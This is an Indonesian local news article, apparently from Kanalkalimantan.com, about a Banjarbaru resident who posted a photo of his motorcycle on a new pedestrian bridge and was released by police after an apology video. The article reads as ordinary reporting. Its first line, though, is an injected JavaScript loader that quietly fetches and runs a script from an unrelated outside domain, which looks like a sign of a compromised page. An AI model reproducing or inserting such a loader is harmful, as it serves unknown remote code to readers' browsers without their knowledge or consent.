(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Pengunggah Foto Motor Naik JPO Banjarbaru 2 Tak Ditahan, SH Bikin Video Permintaan Maaf


KANALKALIMANTAN.COM, BANJARBARU – Pelaku SH yang mengunggah foto di media sosial Facebook, gunakan sepeda motor menaiki Jembatan Penyeberangan Orang (JPO) Banjarbaru 2 di Jalan A Yani Km 34 Kota Banjarbaru, tak ditahan.

Meski sempat dibawa ke Mapolsek Banjarbaru Utara, warga Kecamatan Cempaka ini diketahui sudah diperbolehkan pulang setelah memberikan keterangan ke polisi, sekaligus klarifikasi dan melakukan permintaan maaf kepada khalayak, Sabtu (7/1/2023) malam.

Hal ini dibenarkan Kapolres Banjarbaru, AKBP Dody Harza Kusumah melalui Kasi Humas Polres Banjarbaru, AKP Tajudin Noor mengatakan, pihak kepolisia tidak melakukan penahanan terhadap SH.

“Tidak ditahan, pelaku SH hanya diminta klarifikasi dan permintaan maaf melalui rekaman video,” ujarnya saat dikonfirmasi Kanalkalimantan.com, Minggu (8/1/2023).

 

 

Baca juga: Unggah Foto Motor Menaiki JPO Banjarbaru 2, Polisi Kantongi Pemilik Akun Facebook

Dilanjutkan AKP Tajudin, SH setelah memberikan klarifikasi soa foto di akun facebook miliknya, diakui hanya sebatas konten, dan SH akhirnya diperbolehkan pulang.

“Ya benar, pelaku hanya mengaku sebagai sebuah konten, fotonya di akun facebooknya juga sudah dihapus,” tegasnya.

Pelaku SH saat diminta klarifikasi di Polsek Banjarbaru Utara. Foto: Tan

Pada awal diamankan berdasar dari pengakuan pelaku, SH mengaku mengambil foto bagian depan motor jenis bebek di tangga JPO Banjarbaru 2 itu bersama salah seorang anggota Satpol PP yang berjaga di sana. Lucunya belakangan, setelah dikonfirmasi oleh pihak Satpol PP pengakuan tersebut tidak diakui oleh SH.

“Bismillahirrahmanirrahim, Satpol PP tidak ada terlibat pada konten pembuatan konten di facebook media sosial saya,” ujar pelaku SH berdasarkan potongan video klarifikasi yang diperoleh Kanalkalimantan.com.

Baca juga: SH Diamankan Polisi Akibat Unggah Foto Motor Naiki JPO Banjarbaru 2

Sebelumnya, warganet geger dengan tindakan tercela dugaan seorang pria yang mencoba naik melewati JPO Banjarbaru 2 yang baru saja diresmikan, foto aksi disebarluaskan melalui unggahan di sosial media Facebook pada Sabtu (7/1/2023) malam.

Jembatan Penyeberangan Orang (JPO) yang sejatinya dikhususkan bagi para pejalan kaki justru disalahgunakan oleh pria itu dengan mencoba memacu motornya untuk menyeberang di atas JPO. Sehingga dinilai mengganggu dan berpotensi membahayakan pejalan kaki, maupun kendaraan yang ada di bawahnya.

Dalam unggahan foto itu, moncong sepeda motor diduga jenis bebek 2 tak itu mencoba naik melintas di JPO Banjarbaru 2 yang baru saja dibuka pada Kamis (5/1/2023) malam.

Postingan sempat bikin geger warganet di media sosial, namun sudah hilang atau dihapus oleh si pengunggah.

Berdasarkan tangkapan layar postingan yang tersebar, sang pengguna akun Supianhadi mengunggah di story dan dinding facebooknya dengan foto bagian depan kendaraan roda dua mencoba menaiki lajur disabilitas.

Baca juga: Pakai Knalpot Brong, Para Pemilik Dorong Motor ke Mapolres Banjarbaru

“Nyeberang JPO Dulu Mau Ngisi Bensin..🤣🤣🤣🤣”, tulis akun tersebut sembari menautkan foto yang menggambarkan roda depan sepeda motor berwarna merah, menaiki bagian semen di tangga awal JPO.

Meski hanya sesaat dan segera dihapus, postingan tersebut sempat menyulut perhatian pengguna facebook lainnya. Seperti komentar pengguna bernama Icha Icha. “jgn kaya itu julak masih hanyar lg, sian urang be’kudakan rigat lantainya”.

Kasatpol PP Kota Banjarbaru Hidayaturrahman saat dikonfirmasi, membenarkan dan mengetahui hal itu.

Dirinya mengharapkan, masyarakat dapat menjaga bersama-sama JPO itu.

“Hal itu akan kami tindak lanjuti, dan pengetatan penjagaan. Kita ingin, sesuai arahan Wali Kota untuk menjaga fasilitas itu bersama-sama,” tuturnya. (Kanalkalimantan.com/Ibnu)

Reporter : ibnu
Editor : bie


Risa

Recent Posts

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

13 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

14 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

14 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

14 jam ago

81 Peserta Ikuti Audisi Pemilihan Nanang dan Galuh Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sebanyak 81 orang terdiri atas 27 laki-laki dan 54 perempuan dari beberapa… Read More

14 jam ago

Rumah di Banjarmasin Ambruk ke Sungai, Penghuni Keluar Lewat Jendela

KANALKALIMANTAN.COM, BANJARMASIN - Sebuah rumah di Jalan Sutoyo S, Gang Serumpun, Kelurahan Pelambuan, Kecamatan Banjarmasin… Read More

14 jam ago

This website uses cookies.